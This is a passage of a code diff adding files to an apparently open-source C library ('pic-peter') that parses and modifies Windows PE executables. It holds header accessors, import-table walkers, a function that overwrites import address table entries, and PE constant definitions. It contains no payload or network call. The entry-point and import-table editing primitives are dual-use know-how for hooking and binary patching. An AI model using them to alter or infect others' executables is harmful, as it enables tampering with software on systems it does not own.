DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
}
//hdrs_destroy is empty till now
void hdrs_destroy(hdrs *self)
{
return;
}

85
pic-peter/hdrs.h Normal file
View File

@ -0,0 +1,85 @@
//License: GPLv3.0
#ifndef HDRS
#define HDRS
#include "../stdfuncs.h"
#include <stdint.h>
//#include "pe.h"
//#include "/usr/x86_64-w64-mingw32/include/windef.h"
//#include "/usr/x86_64-w64-mingw32/include/winnt.h"
typedef struct _hdrs
{
char type; //32 or 64Bit?
IMAGE_DOS_HEADER *dos;
void *nt;
IMAGE_FILE_HEADER *file;
void *opt;
}hdrs;
//returns -1 on failure and 0 on success
int hdrs_init(hdrs *self, void *image);
//set and get for file header
uint16_t hdrs_get_machine_type(hdrs *self);
uint16_t hdrs_get_number_of_sections(hdrs *self);
void hdrs_set_number_of_sections(hdrs *self, uint16_t setVal);
uint32_t hdrs_get_time_date_stamp(hdrs *self);
void hdrs_set_time_date_stamp(hdrs *self, uint32_t setVal);
uint32_t hdrs_get_pointer_to_symbol_table(hdrs *self);
void hdrs_set_pointer_to_symbol_table(hdrs *self, uint32_t setVal);
uint32_t hdrs_get_number_of_symbols(hdrs *self);
void hdrs_set_number_of_symbold(hdrs *self, uint32_t setVal);
uint16_t hdrs_get_characteristics(hdrs *self);
void hdrs_set_characteristics(hdrs *self, uint16_t setVal);
//set and get for optional header
uint32_t hdrs_get_size_of_code(hdrs *self);
void hdrs_set_size_of_code(hdrs *self, uint32_t setVal);
uint32_t hdrs_get_size_of_initialized_data(hdrs *self);
void hdrs_set_size_of_initialized_data(hdrs *self, uint32_t setVal);
uint32_t hdrs_get_size_of_uninitialized_data(hdrs *self);
void hdrs_set_size_of_uninitialized_data(hdrs *self, uint32_t setVal);
uint32_t hdrs_get_address_of_entry_point(hdrs *self);
void hdrs_set_address_of_entry_point(hdrs *self, uint32_t setVal);
uint32_t hdrs_get_base_of_code(hdrs *self);
void hdrs_set_base_of_code(hdrs *self, uint32_t setVal);
uint32_t hdrs_get_base_of_data(hdrs *self);
void hdrs_set_base_of_data(hdrs *self, uint32_t setVal);
uint64_t hdrs_get_image_base(hdrs *self);
void hdrs_set_image_base(hdrs *self, uint64_t setVal);
uint32_t hdrs_get_section_alignment(hdrs *self);
void hdrs_set_section_alignment(hdrs *self, uint32_t setVal);
uint32_t hdrs_get_file_alignment(hdrs *self);
void hdrs_set_file_alignment(hdrs *self, uint32_t setVal);
uint32_t hdrs_get_size_of_image(hdrs *self);
void hdrs_set_size_of_image(hdrs *self, uint32_t setVal);
uint32_t hdrs_get_checksum(hdrs *self);
void hdrs_set_checksum(hdrs *self, uint32_t setVal);
uint32_t hdrs_get_number_of_rva_and_sizes(hdrs *self);
void hdrs_set_number_of_rva_and_sizes(hdrs *self, uint32_t setVal);
//data directorys
uint32_t hdrs_get_first_import_descriptor_rva(hdrs *self);
void hdrs_set_data_directory_import(hdrs *self,
IMAGE_DATA_DIRECTORY *setVal);
void hdrs_set_data_directory_iat(hdrs *self,
IMAGE_DATA_DIRECTORY *setVal);
uint32_t hdrs_get_load_cfg_rva(hdrs *self);
uint32_t hdrs_get_load_cfg_size(hdrs *self);
void hdrs_set_data_directory_load_cfg(hdrs *self,
IMAGE_DATA_DIRECTORY *setVal);
uint32_t hdrs_get_export_directory(hdrs *self);
/////////////////////////////////////////////////
//section headers
IMAGE_SECTION_HEADER *hdrs_get_first_section_header(hdrs *self);
void hdrs_destroy(hdrs *self);
#endif

185
pic-peter/imports.c Normal file
View File

@ -0,0 +1,185 @@
//License: GPLv3.0
#include "imports.h"
IMAGE_IMPORT_DESCRIPTOR *imports_by_index_get_import_descriptor(void *image, int idtIdx)
{
IMAGE_IMPORT_DESCRIPTOR *imp;
hdrs h;
hdrs_init(&h, image);
imp = (IMAGE_IMPORT_DESCRIPTOR*)rva_to_ptr(image,
hdrs_get_first_import_descriptor_rva(&h));
imp = &imp[idtIdx];
if (-1 == test_for_list_end(imp, idtIdx, sizeof(IMAGE_IMPORT_DESCRIPTOR)))
return NULL;
return imp;
}
/////////////////////////////////////////////////
char *imports_by_index_get_name(void *image, int idtIdx)
{
IMAGE_IMPORT_DESCRIPTOR *imp;
imp = (IMAGE_IMPORT_DESCRIPTOR*)
imports_by_index_get_import_descriptor(image, idtIdx);
if (NULL == imp) return NULL;
return (char *)rva_to_ptr(image, imp->Name);
}
/////////////////////////////////////////////////
int imports_by_name_get_index(void *image, const char *name)
{
int i = 0;
char *currentName;
do
{
currentName = imports_by_index_get_name(image, i);
if (NULL == currentName)
return -1;
if (0 == pic_strncmp(currentName, name, pic_strlen(name)))
return i;
i++;
}while(1);
}
/////////////////////////////////////////////////
int imports_by_name_get_iname_index_by_name(void *image, const char *dllName,
const char *funcName)
{
int idtIdx;
int intIdx;
IMAGE_IMPORT_BY_NAME *currentIname;
idtIdx = imports_by_name_get_index(image, dllName);
if (-1 == idtIdx) return -1;
intIdx = 0;
while (1)
{
currentIname = imports_by_index_get_iname_by_index(image, idtIdx,
intIdx);
if (NULL == currentIname) return -1;
if (0 == pic_strncmp(currentIname->Name, funcName, pic_strlen(funcName)))
return intIdx;
intIdx++;
}
}
/////////////////////////////////////////////////
IMAGE_IMPORT_BY_NAME *imports_by_index_get_iname_by_index(void *image,
int idtIdx,
int intIdx)
{
/*TODO: handling of IMAGE_ORDINAL_FLAG */
IMAGE_IMPORT_DESCRIPTOR *imp;
IMAGE_THUNK_DATA32 *thd32;
IMAGE_THUNK_DATA64 *thd64;
hdrs h;
hdrs_init(&h, image);
int i = 0;
uint32_t firstThunkRva;
imp = imports_by_index_get_import_descriptor(image, idtIdx);
if (NULL == imp) return NULL;
firstThunkRva = imp->u1.OriginalFirstThunk;
/* someone told me some linkers place the OriginalFirstThunk
* wrongly into FirstThunk. This is how i tried to handle that. */
if (0 == firstThunkRva) firstThunkRva = imp->FirstThunk;
if (64 == h.type)
{
thd64 = (IMAGE_THUNK_DATA64*)rva_to_ptr(image, firstThunkRva);
for (i = 0; i <= intIdx; i++)
{
if (0 == (&thd64[i])->u1.AddressOfData)
break;
}
i--;
if (i == intIdx)
return (IMAGE_IMPORT_BY_NAME*)rva_to_ptr(image,
(&thd64[intIdx])->u1.AddressOfData);
else return NULL;
}
else if (32 == h.type)
{
thd32 = (IMAGE_THUNK_DATA32*)rva_to_ptr(image, firstThunkRva);
for (i = 0; i <= intIdx; i++)
{
if (0 == (&thd32[i])->u1.AddressOfData)
break;
}
i--;
if (i == intIdx)
return (IMAGE_IMPORT_BY_NAME*)rva_to_ptr(image,
(&thd32[intIdx])->u1.AddressOfData);
else return NULL;
}
return NULL;
}
/////////////////////////////////////////////////
void *imports_by_index_get_iaddr_thunk_by_index(void *image, int idtIdx, int iatIdx)
{
IMAGE_IMPORT_DESCRIPTOR *imp;
IMAGE_THUNK_DATA64 *thd64;
IMAGE_THUNK_DATA32 *thd32;
hdrs h;
int i;
hdrs_init(&h, image);
imp = imports_by_index_get_import_descriptor(image, idtIdx);
if (64 == h.type)
{
thd64 = (IMAGE_THUNK_DATA64*)rva_to_ptr(image, imp->FirstThunk);
i = 0;
while (i <= iatIdx)
{
if (i == iatIdx) return &thd64[i];
i++;
}
return NULL;
}
else if (32 == h.type)
{
thd32 = (IMAGE_THUNK_DATA32*)rva_to_ptr(image, imp->FirstThunk);
i = 0;
while (i <= iatIdx)
{
if (i == iatIdx) return &thd32[i];
i ++;
}
return NULL;
}
return NULL;
}
/////////////////////////////////////////////////
void imports_by_index_set_iaddr_thunk_by_index(void *image, int idtIdx,
int iatIdx, void *address)
{
IMAGE_THUNK_DATA32 *thd32;
IMAGE_THUNK_DATA64 *thd64;
hdrs h;
hdrs_init(&h, image);
if (64 == h.type)
{
thd64 = imports_by_index_get_iaddr_thunk_by_index(image, idtIdx,
iatIdx);
thd64->u1.Function = (uint64_t)address;
}
if (32 == h.type)
{
thd32 = imports_by_index_get_iaddr_thunk_by_index(image, idtIdx,
iatIdx);
thd32->u1.Function = (uint32_t)address;
}
hdrs_destroy(&h);
return;
}

94
pic-peter/imports.h Normal file
View File

@ -0,0 +1,94 @@
//License: GPLv3.0
/*! \file imports.h
\brief These functions give you information about the import table.
*/
#ifndef IMPORTS_H
#define IMPORTS_H
#include "hdrs.h"
#include "sections.h"
#include "misc.h"
/*! \fn IMAGE_IMPORT_DESCRIPTOR *imports_by_index_get_import_descriptor(
void *image, int i)
\brief return the import descriptor with the index i
\param image points to the image you want to analyze
\param i is 0 if you need the first import descriptor
i = 1 for the second and so on
*/
IMAGE_IMPORT_DESCRIPTOR *imports_by_index_get_import_descriptor(void *image, int i);
/*! \fn char *imports_by_index_get_name(void *image, int i)
\brief returns a char *pointer on the import descriptors name (the dll name)
\param image points tor the image you want to analyzee
\param i is an index indicating which import disc.
you want the name of (starting with 0)
*/
char *imports_by_index_get_name(void *image, int i);
/*! \fn int imports_by_name_get_index(void *image, const char *name)
\brief returns the import descroptor index that fits the name parameter
\param image points on the image you want to analyze
\param name the dll name (== import descriptor name) you want the idx of
*/
int imports_by_name_get_index(void *image, const char *name);
/*! \fn imports_by_name_get_iname_index_by_name(void *image,
const char *dllName,
const char *funcName)
\brief returns the index of the imported fucntion of a dll
(that's not an ordinal)
\param image points to the PE file you want information of
\param dllName is the name of the dll (import descriptor name)
where the function name resides in
\param funcName is the name of the function you want the index of
*/
int imports_by_name_get_iname_index_by_name(void *image, const char *dllName,
const char *funcName);
/*! \fn IMAGE_IMPORT_BY_NAME *imports_by_index_get_iname_by_index(void *image,
int idtIdx,
int intIdx)
\brief you give it two indexes (import descriptor and its import name table)
and you get the name of the function these two indexes discribe.
That means you will get the first function name of the first
imported dll if idtIdx and intIdx are both == 0. The returned
pointer is an IMAGE_IMPORT_BY_NAME struct which is actually
a uint8_t array but with a word (16bit) value at its start.
\param image points to the PE file
\param idtIdx is the import descriptor index
(starting at 0 for the first import descriptor)
\param intIdx is the name table index (also starting with 0)
*/
IMAGE_IMPORT_BY_NAME *imports_by_index_get_iname_by_index(void *image,
int idtIdx,
int intIdx);
/*! \fn void *imports_by_index_get_iaddr_thunk_by_index(void *image,
int idtIdx,
int iatIdx)
\brief like imports_by_index_get_iname_by_index() but doesn't return a
name but a pointer on IMAGE_THUNK_DATA if it's a 32bit executable
this function will return IMAGE_THUNK_DATA32 and if you have 64bit
you may use the return value as a pointer on IMAGE_THUNK_DATA64
\param image is the PE file
\param idtIdx is an import descriptor index
\param iatIdx is the address table index
*/
void *imports_by_index_get_iaddr_thunk_by_index(void *image, int idtIdx, int iatIdx);
/*! \fn void imports_by_index_set_iaddr_thunk_by_index(void *image, int idtIdx,
int iatIdx, void *address);
\brief Writes an address into the specified field of the import address
table.
\param image is the PE file.
\param idtIdx is the import descriptor index.
\param iatIdx is the address table index.
\param address is the address you want to write.
*/
void imports_by_index_set_iaddr_thunk_by_index(void *image, int idtIdx,
int iatIdx, void *address);
/******* /*! \fn void *imports_by_index_get_iat(void *image, int i)
\brief returns a
void *imports_by_index_get_iat(void *image, int i); */
#endif

27
pic-peter/misc.c Normal file
View File

@ -0,0 +1,27 @@
//License: GPLv3.0
#include "misc.h"
long align(long size, long align)
{
int alignBuffer = align;
while (alignBuffer < size)
alignBuffer += align;
return alignBuffer;
}
/////////////////////////////////////////////////
/* this function tests for if index points behind
* the terminating 0x00 element */
int test_for_list_end(void *list, int index, int null_size_in_bytes)
{
int trigger = 0;
for (int i = 0; i < index; i++)
{
for (int j = 0; j < null_size_in_bytes; j++)
if (((char *)list)[(i*null_size_in_bytes)+j] != 0) trigger = 1;
if (trigger == 0) return -1;
trigger = 0;
}
return 0;
}

5
pic-peter/misc.h Normal file
View File

@ -0,0 +1,5 @@
//License: GPLv3.0
/* this function tests for if index points behind
* the terminating 0x00 element */
int test_for_list_end(void *list, int index, int null_size_in_bytes);
long align(long size, long align);

563
pic-peter/pe.h Normal file
View File

@ -0,0 +1,563 @@
//License: GPLv3.0
#ifndef PE_H
#define PE_H
#include <stdint.h>
#define IMAGE_DOS_SIGNATURE 0x5A4D // MZ
#define IMAGE_NT_SIGNATURE 0x00004550 // PE00
#define IMAGE_SIZEOF_FILE_HEADER 20
#define IMAGE_FILE_EXECUTABLE_IMAGE 0x0002 // File is executable (i.e. no unresolved externel references).
#define IMAGE_FILE_LINE_NUMS_STRIPPED 0x0004 // Line nunbers stripped from file.
#define IMAGE_FILE_LOCAL_SYMS_STRIPPED 0x0008 // Local symbols stripped from file.
#define IMAGE_FILE_AGGRESIVE_WS_TRIM 0x0010 // Agressively trim working set
#define IMAGE_FILE_LARGE_ADDRESS_AWARE 0x0020 // App can handle >2gb addresses
#define IMAGE_FILE_BYTES_REVERSED_LO 0x0080 // Bytes of machine word are reversed.
#define IMAGE_FILE_32BIT_MACHINE 0x0100 // 32 bit word machine.
#define IMAGE_FILE_DEBUG_STRIPPED 0x0200 // Debugging info stripped from file in .DBG file
#define IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP 0x0400 // If Image is on removable media, copy and run from the swap file.
#define IMAGE_FILE_NET_RUN_FROM_SWAP 0x0800 // If Image is on Net, copy and run from the swap file.
#define IMAGE_FILE_SYSTEM 0x1000 // System File.
#define IMAGE_FILE_DLL 0x2000 // File is a DLL.
#define IMAGE_FILE_UP_SYSTEM_ONLY 0x4000 // File should only be run on a UP machine
#define IMAGE_FILE_BYTES_REVERSED_HI 0x8000 // Bytes of machine word are reversed.
#define IMAGE_FILE_MACHINE_UNKNOWN 0
#define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386.
#define IMAGE_FILE_MACHINE_R3000 0x0162 // MIPS little-endian, 0x160 big-endian
#define IMAGE_FILE_MACHINE_R4000 0x0166 // MIPS little-endian
#define IMAGE_FILE_MACHINE_WCEMIPSV2 0x0169 // MIPS little-endian WCE v2
#define IMAGE_FILE_MACHINE_ALPHA 0x0184 // Alpha_AXP
#define IMAGE_FILE_MACHINE_SH3 0x01a2 // SH3 little-endian
#define IMAGE_FILE_MACHINE_SH3DSP 0x01a3
#define IMAGE_FILE_MACHINE_SH3E 0x01a4 // SH3E little-endian
#define IMAGE_FILE_MACHINE_SH4 0x01a6 // SH4 little-endian
#define IMAGE_FILE_MACHINE_SH5 0x01a8 // SH5
#define IMAGE_FILE_MACHINE_ARM 0x01c0 // ARM Little-Endian
#define IMAGE_FILE_MACHINE_THUMB 0x01c2
#define IMAGE_FILE_MACHINE_AM33 0x01d3
#define IMAGE_FILE_MACHINE_POWERPC 0x01F0 // IBM PowerPC Little-Endian
#define IMAGE_FILE_MACHINE_POWERPCFP 0x01f1
#define IMAGE_FILE_MACHINE_IA64 0x0200 // Intel 64
#define IMAGE_FILE_MACHINE_MIPS16 0x0266 // MIPS
#define IMAGE_FILE_MACHINE_ALPHA64 0x0284 // ALPHA64
#define IMAGE_FILE_MACHINE_MIPSFPU 0x0366 // MIPS
#define IMAGE_FILE_MACHINE_MIPSFPU16 0x0466 // MIPS
#define IMAGE_FILE_MACHINE_AXP64 IMAGE_FILE_MACHINE_ALPHA64
#define IMAGE_FILE_MACHINE_TRICORE 0x0520 // Infineon
#define IMAGE_FILE_MACHINE_CEF 0x0CEF
#define IMAGE_FILE_MACHINE_EBC 0x0EBC // EFI Byte Code
#define IMAGE_FILE_MACHINE_AMD64 0x8664 // AMD64 (K8)
#define IMAGE_FILE_MACHINE_M32R 0x9041 // M32R little-endian
#define IMAGE_FILE_MACHINE_CEE 0xC0EE
#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16
#define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b
#define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b
#define IMAGE_ROM_OPTIONAL_HDR_MAGIC 0x107
#define IMAGE_SUBSYSTEM_UNKNOWN 0 // Unknown subsystem.
#define IMAGE_SUBSYSTEM_NATIVE 1 // Image doesn't require a subsystem.
#define IMAGE_SUBSYSTEM_WINDOWS_GUI 2 // Image runs in the Windows GUI subsystem.
#define IMAGE_SUBSYSTEM_WINDOWS_CUI 3 // Image runs in the Windows character subsystem.
#define IMAGE_SUBSYSTEM_OS2_CUI 5 // image runs in the OS/2 character subsystem.
#define IMAGE_SUBSYSTEM_POSIX_CUI 7 // image runs in the Posix character subsystem.
#define IMAGE_SUBSYSTEM_NATIVE_WINDOWS 8 // image is a native Win9x driver.
#define IMAGE_SUBSYSTEM_WINDOWS_CE_GUI 9 // Image runs in the Windows CE subsystem.
#define IMAGE_SUBSYSTEM_EFI_APPLICATION 10 //
#define IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER 11 //
#define IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER 12 //
#define IMAGE_SUBSYSTEM_EFI_ROM 13
#define IMAGE_SUBSYSTEM_XBOX 14
#define IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION 16
#define IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 0x0040 // DLL can move.
#define IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY 0x0080 // Code Integrity Image
#define IMAGE_DLLCHARACTERISTICS_NX_COMPAT 0x0100 // Image is NX compatible
#define IMAGE_DLLCHARACTERISTICS_NO_ISOLATION 0x0200 // Image understands isolation and doesn't want it
#define IMAGE_DLLCHARACTERISTICS_NO_SEH 0x0400 // Image does not use SEH. No SE handler may reside in this image
#define IMAGE_DLLCHARACTERISTICS_NO_BIND 0x0800 // Do not bind this image.
#define IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE 0x8000
#define IMAGE_DIRECTORY_ENTRY_EXPORT 0 // Export Directory
#define IMAGE_DIRECTORY_ENTRY_IMPORT 1 // Import Directory
#define IMAGE_DIRECTORY_ENTRY_RESOURCE 2 // Resource Directory
#define IMAGE_DIRECTORY_ENTRY_EXCEPTION 3 // Exception Directory
#define IMAGE_DIRECTORY_ENTRY_SECURITY 4 // Security Directory
#define IMAGE_DIRECTORY_ENTRY_BASERELOC 5 // Base Relocation Table
#define IMAGE_DIRECTORY_ENTRY_DEBUG 6 // Debug Directory
#define IMAGE_DIRECTORY_ENTRY_ARCHITECTURE 7 // Architecture Specific Data
#define IMAGE_DIRECTORY_ENTRY_GLOBALPTR 8 // RVA of GP
#define IMAGE_DIRECTORY_ENTRY_TLS 9 // TLS Directory
#define IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 10 // Load Configuration Directory
#define IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 11 // Bound Import Directory in headers
#define IMAGE_DIRECTORY_ENTRY_IAT 12 // Import Address Table
#define IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 13 // Delay Load Import Descriptors
#define IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14 // COM Runtime descriptor
#define IMAGE_SIZEOF_SHORT_NAME 8
#define IMAGE_SIZEOF_SECTION_HEADER 40
#define IMAGE_SCN_TYPE_NO_PAD 0x00000008 // Reserved.
#define IMAGE_SCN_CNT_CODE 0x00000020 // Section contains code.
#define IMAGE_SCN_CNT_INITIALIZED_DATA 0x00000040 // Section contains initialized data.
#define IMAGE_SCN_CNT_UNINITIALIZED_DATA 0x00000080 // Section contains uninitialized data.
#define IMAGE_SCN_LNK_OTHER 0x00000100 // Reserved.
#define IMAGE_SCN_LNK_INFO 0x00000200 // Section contains comments or some other type of information.
#define IMAGE_SCN_LNK_REMOVE 0x00000800 // Section contents will not become part of image.
#define IMAGE_SCN_LNK_COMDAT 0x00001000 // Section contents comdat.
#define IMAGE_SCN_NO_DEFER_SPEC_EXC 0x00004000 // Reset speculative exceptions handling bits in the TLB entries for this section.
#define IMAGE_SCN_GPREL 0x00008000 // Section content can be accessed relative to GP
#define IMAGE_SCN_MEM_FARDATA 0x00008000
#define IMAGE_SCN_MEM_PURGEABLE 0x00020000
#define IMAGE_SCN_MEM_16BIT 0x00020000
#define IMAGE_SCN_MEM_LOCKED 0x00040000
#define IMAGE_SCN_MEM_PRELOAD 0x00080000
#define IMAGE_SCN_ALIGN_1BYTES 0x00100000 //
#define IMAGE_SCN_ALIGN_2BYTES 0x00200000 //
#define IMAGE_SCN_ALIGN_4BYTES 0x00300000 //
#define IMAGE_SCN_ALIGN_8BYTES 0x00400000 //
#define IMAGE_SCN_ALIGN_16BYTES 0x00500000 // Default alignment if no others are specified.
#define IMAGE_SCN_ALIGN_32BYTES 0x00600000 //
#define IMAGE_SCN_ALIGN_64BYTES 0x00700000 //
#define IMAGE_SCN_ALIGN_128BYTES 0x00800000 //
#define IMAGE_SCN_ALIGN_256BYTES 0x00900000 //
#define IMAGE_SCN_ALIGN_512BYTES 0x00A00000 //
#define IMAGE_SCN_ALIGN_1024BYTES 0x00B00000 //
#define IMAGE_SCN_ALIGN_2048BYTES 0x00C00000 //
#define IMAGE_SCN_ALIGN_4096BYTES 0x00D00000 //
#define IMAGE_SCN_ALIGN_8192BYTES 0x00E00000 //
#define IMAGE_SCN_ALIGN_MASK 0x00F00000
#define IMAGE_SCN_LNK_NRELOC_OVFL 0x01000000 // Section contains extended relocations.
#define IMAGE_SCN_MEM_DISCARDABLE 0x02000000 // Section can be discarded.
#define IMAGE_SCN_MEM_NOT_CACHED 0x04000000 // Section is not cachable.
#define IMAGE_SCN_MEM_NOT_PAGED 0x08000000 // Section is not pageable.
#define IMAGE_SCN_MEM_SHARED 0x10000000 // Section is shareable.
#define IMAGE_SCN_MEM_EXECUTE 0x20000000 // Section is executable.
#define IMAGE_SCN_MEM_READ 0x40000000 // Section is readable.
#define IMAGE_SCN_MEM_WRITE 0x80000000 // Section is writeable.
#define IMAGE_SCN_SCALE_INDEX 0x00000001 // Tls index is scaled
#define IMAGE_SIZEOF_SYMBOL 18
#define IMAGE_SYM_TYPE_NULL 0x0000 // no type.
#define IMAGE_SYM_TYPE_VOID 0x0001 //
#define IMAGE_SYM_TYPE_CHAR 0x0002 // type character.
#define IMAGE_SYM_TYPE_SHORT 0x0003 // type short integer.
#define IMAGE_SYM_TYPE_INT 0x0004 //
#define IMAGE_SYM_TYPE_LONG 0x0005 //
#define IMAGE_SYM_TYPE_FLOAT 0x0006 //
#define IMAGE_SYM_TYPE_DOUBLE 0x0007 //
#define IMAGE_SYM_TYPE_STRUCT 0x0008 //
#define IMAGE_SYM_TYPE_UNION 0x0009 //
#define IMAGE_SYM_TYPE_ENUM 0x000A // enumeration.
#define IMAGE_SYM_TYPE_MOE 0x000B // member of enumeration.
#define IMAGE_SYM_TYPE_BYTE 0x000C //
#define IMAGE_SYM_TYPE_WORD 0x000D //
#define IMAGE_SYM_TYPE_UINT 0x000E //
#define IMAGE_SYM_TYPE_DWORD 0x000F //
#define IMAGE_SYM_TYPE_PCODE 0x8000 //
#define IMAGE_SYM_DTYPE_NULL 0 // no derived type.
#define IMAGE_SYM_DTYPE_POINTER 1 // pointer.
#define IMAGE_SYM_DTYPE_FUNCTION 2 // function.
#define IMAGE_SYM_DTYPE_ARRAY 3 // array.
#define IMAGE_SYM_CLASS_NULL 0x0000
#define IMAGE_SYM_CLASS_AUTOMATIC 0x0001
#define IMAGE_SYM_CLASS_EXTERNAL 0x0002
#define IMAGE_SYM_CLASS_STATIC 0x0003
#define IMAGE_SYM_CLASS_REGISTER 0x0004
#define IMAGE_SYM_CLASS_EXTERNAL_DEF 0x0005
#define IMAGE_SYM_CLASS_LABEL 0x0006
#define IMAGE_SYM_CLASS_UNDEFINED_LABEL 0x0007
#define IMAGE_SYM_CLASS_MEMBER_OF_STRUCT 0x0008
#define IMAGE_SYM_CLASS_ARGUMENT 0x0009
#define IMAGE_SYM_CLASS_STRUCT_TAG 0x000A
#define IMAGE_SYM_CLASS_MEMBER_OF_UNION 0x000B
#define IMAGE_SYM_CLASS_UNION_TAG 0x000C
#define IMAGE_SYM_CLASS_TYPE_DEFINITION 0x000D
#define IMAGE_SYM_CLASS_UNDEFINED_STATIC 0x000E
#define IMAGE_SYM_CLASS_ENUM_TAG 0x000F
#define IMAGE_SYM_CLASS_MEMBER_OF_ENUM 0x0010
#define IMAGE_SYM_CLASS_REGISTER_PARAM 0x0011
#define IMAGE_SYM_CLASS_BIT_FIELD 0x0012
#define IMAGE_SYM_CLASS_FAR_EXTERNAL 0x0044 //
#define IMAGE_SYM_CLASS_BLOCK 0x0064
#define IMAGE_SYM_CLASS_FUNCTION 0x0065
#define IMAGE_SYM_CLASS_END_OF_STRUCT 0x0066
#define IMAGE_SYM_CLASS_FILE 0x0067
#define IMAGE_SYM_CLASS_SECTION 0x0068
#define IMAGE_SYM_CLASS_WEAK_EXTERNAL 0x0069
#define IMAGE_SYM_CLASS_CLR_TOKEN 0x006B
#define IMAGE_REL_I386_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
#define IMAGE_REL_I386_DIR16 0x0001 // Direct 16-bit reference to the symbols virtual address
#define IMAGE_REL_I386_REL16 0x0002 // PC-relative 16-bit reference to the symbols virtual address
#define IMAGE_REL_I386_DIR32 0x0006 // Direct 32-bit reference to the symbols virtual address
#define IMAGE_REL_I386_DIR32NB 0x0007 // Direct 32-bit reference to the symbols virtual address, base not included
#define IMAGE_REL_I386_SEG12 0x0009 // Direct 16-bit reference to the segment-selector bits of a 32-bit virtual address
#define IMAGE_REL_I386_SECTION 0x000A
#define IMAGE_REL_I386_SECREL 0x000B
#define IMAGE_REL_I386_TOKEN 0x000C // clr token
#define IMAGE_REL_I386_SECREL7 0x000D // 7 bit offset from base of section containing target
#define IMAGE_REL_I386_REL32 0x0014 // PC-relative 32-bit reference to the symbols virtual address
#define IMAGE_REL_MIPS_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
#define IMAGE_REL_MIPS_REFHALF 0x0001
#define IMAGE_REL_MIPS_REFWORD 0x0002
#define IMAGE_REL_MIPS_JMPADDR 0x0003
#define IMAGE_REL_MIPS_REFHI 0x0004
#define IMAGE_REL_MIPS_REFLO 0x0005
#define IMAGE_REL_MIPS_GPREL 0x0006
#define IMAGE_REL_MIPS_LITERAL 0x0007
#define IMAGE_REL_MIPS_SECTION 0x000A
#define IMAGE_REL_MIPS_SECREL 0x000B
#define IMAGE_REL_MIPS_SECRELLO 0x000C // Low 16-bit section relative referemce (used for >32k TLS)
#define IMAGE_REL_MIPS_SECRELHI 0x000D // High 16-bit section relative reference (used for >32k TLS)
#define IMAGE_REL_MIPS_TOKEN 0x000E // clr token
#define IMAGE_REL_MIPS_JMPADDR16 0x0010
#define IMAGE_REL_MIPS_REFWORDNB 0x0022
#define IMAGE_REL_MIPS_PAIR 0x0025
#define IMAGE_REL_ALPHA_ABSOLUTE 0x0000
#define IMAGE_REL_ALPHA_REFLONG 0x0001
#define IMAGE_REL_ALPHA_REFQUAD 0x0002
#define IMAGE_REL_ALPHA_GPREL32 0x0003
#define IMAGE_REL_ALPHA_LITUSE 0x0005
#define IMAGE_REL_ALPHA_GPDISP 0x0006
#define IMAGE_REL_ALPHA_BRADDR 0x0007
#define IMAGE_REL_ALPHA_HINT 0x0008
#define IMAGE_REL_ALPHA_INLINE_REFLONG 0x0009
#define IMAGE_REL_ALPHA_REFHI 0x000A
#define IMAGE_REL_ALPHA_REFLO 0x000B
#define IMAGE_REL_ALPHA_PAIR 0x000C
#define IMAGE_REL_ALPHA_MATCH 0x000D
#define IMAGE_REL_ALPHA_SECTION 0x000E
#define IMAGE_REL_ALPHA_SECREL 0x000F
#define IMAGE_REL_ALPHA_REFLONGNB 0x0010
#define IMAGE_REL_ALPHA_SECRELLO 0x0011 // Low 16-bit section relative reference
#define IMAGE_REL_ALPHA_SECRELHI 0x0012 // High 16-bit section relative reference
#define IMAGE_REL_ALPHA_REFQ3 0x0013 // High 16 bits of 48 bit reference
#define IMAGE_REL_ALPHA_REFQ2 0x0014 // Middle 16 bits of 48 bit reference
#define IMAGE_REL_ALPHA_REFQ1 0x0015 // Low 16 bits of 48 bit reference
#define IMAGE_REL_ALPHA_GPRELLO 0x0016 // Low 16-bit GP relative reference
#define IMAGE_REL_ALPHA_GPRELHI 0x0017 // High 16-bit GP relative reference
#define IMAGE_REL_PPC_ABSOLUTE 0x0000 // NOP
#define IMAGE_REL_PPC_ADDR64 0x0001 // 64-bit address
#define IMAGE_REL_PPC_ADDR32 0x0002 // 32-bit address
#define IMAGE_REL_PPC_ADDR24 0x0003 // 26-bit address, shifted left 2 (branch absolute)
#define IMAGE_REL_PPC_ADDR16 0x0004 // 16-bit address
#define IMAGE_REL_PPC_REL24 0x0006 // 26-bit PC-relative offset, shifted left 2 (branch relative)
#define IMAGE_REL_PPC_REL14 0x0007 // 16-bit PC-relative offset, shifted left 2 (br cond relative)
#define IMAGE_REL_PPC_TOCREL16 0x0008 // 16-bit offset from TOC base
#define IMAGE_REL_PPC_ADDR32NB 0x000A // 32-bit addr w/o image base
#define IMAGE_REL_PPC_SECREL 0x000B // va of containing section (as in an image sectionhdr)
#define IMAGE_REL_PPC_SECTION 0x000C // sectionheader number
#define IMAGE_REL_PPC_IFGLUE 0x000D // substitute TOC restore instruction iff symbol is glue code
#define IMAGE_REL_PPC_SECREL16 0x000F // va of containing section (limited to 16 bits)
#define IMAGE_REL_PPC_REFLO 0x0011
#define IMAGE_REL_PPC_PAIR 0x0012
#define IMAGE_REL_PPC_SECRELHI 0x0014 // High 16-bit section relative reference (used for >32k TLS)
#define IMAGE_REL_PPC_GPREL 0x0015
#define IMAGE_REL_PPC_TOKEN 0x0016 // clr token
#define IMAGE_REL_PPC_NEG 0x0100 // subtract reloc value rather than adding it
#define IMAGE_REL_PPC_BRTAKEN 0x0200 // fix branch prediction bit to predict branch taken
#define IMAGE_REL_PPC_BRNTAKEN 0x0400 // fix branch prediction bit to predict branch not taken
